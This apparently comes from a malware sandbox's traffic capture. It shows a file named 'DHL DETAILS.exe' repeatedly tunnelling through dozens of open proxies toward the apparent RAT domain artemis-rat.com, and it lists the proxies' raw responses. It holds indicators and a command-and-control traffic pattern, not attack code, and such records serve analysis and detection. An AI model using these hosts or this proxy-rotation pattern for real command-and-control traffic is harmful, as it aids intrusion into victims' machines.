                                                                                    Mar 9, 2024 13:14:15.331496000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.974163055 CET311INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 166
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    778192.168.2.55243741.111.198.108806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.331538916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.910145044 CET708INHTTP/1.1 500 Internal Server Error
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 532
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    779192.168.2.55242151.83.140.7081816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.339485884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.671163082 CET325INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.14.2
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 173
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.2</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    780192.168.2.55236149.4.48.12888886352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.339802980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    781192.168.2.55249293.190.142.57265416352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.341701984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.636974096 CET226INHTTP/1.1 403 Forbidden
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Length: 101
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a
                                                                                    Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
                                                                                    Mar 9, 2024 13:14:16.455274105 CET226INHTTP/1.1 403 Forbidden
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Length: 101
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a
                                                                                    Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    782192.168.2.552552104.145.235.20031286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.343293905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.565403938 CET247INHTTP/1.0 307 Temporary Redirect
                                                                                    Server: squid/3.1.23
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 0
                                                                                    Location: http://check.unblock-us.com/?url=artemis-rat.com%3A443
                                                                                    Connection: keep-alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    783192.168.2.55245543.155.142.116156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.343900919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    784192.168.2.55236249.228.131.16950006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.353023052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    785192.168.2.552465198.44.255.3806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.358094931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.674864054 CET309INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.24.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 157
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.24.0</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    786192.168.2.5515838.217.143.187156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.360726118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    787192.168.2.551578202.61.204.51806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.362063885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.536266088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.630251884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    788192.168.2.55249020.206.106.192806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.369631052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.690192938 CET319INHTTP/1.1 403 Forbidden
                                                                                    Server: squid
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 17
                                                                                    X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                    X-Cache: MISS from cdn-fintech.info
                                                                                    X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                                                                    Data Ascii: ERR_ACCESS_DENIED


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    789192.168.2.552382103.49.202.252806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.371601105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.746675014 CET343INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.14.0 (Ubuntu)
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 182
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    790192.168.2.552629104.17.84.150806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.374190092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.528342009 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    791192.168.2.55256072.210.221.19741456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.379573107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    792192.168.2.55257852.35.240.11910806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.387530088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.579227924 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    793192.168.2.552825202.159.35.1534436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.388196945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    794192.168.2.552539177.234.244.174322136352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.389158964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    795192.168.2.552827202.159.35.1534436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.389442921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    796192.168.2.552828202.159.35.1534436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.390724897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    797192.168.2.55243658.234.116.197806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.390749931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    798192.168.2.552658172.67.206.105806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.390947104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.545305967 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    799192.168.2.55252646.17.63.16644446352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.394011974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.687347889 CET339INHTTP/1.1 403 Forbidden
                                                                                    Server: squid/4.7
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 5
                                                                                    X-Squid-Error: TCP_RESET 0
                                                                                    Vary: Accept-Language
                                                                                    Content-Language: en
                                                                                    X-Cache: MISS from proxy.wakoopa.com
                                                                                    Via: 1.1 proxy.wakoopa.com (squid/4.7)
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 72 65 73 65 74
                                                                                    Data Ascii: reset


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    800192.168.2.552830202.159.35.1534436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.395559072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    801192.168.2.55268331.43.179.160806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.453263998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.607429028 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
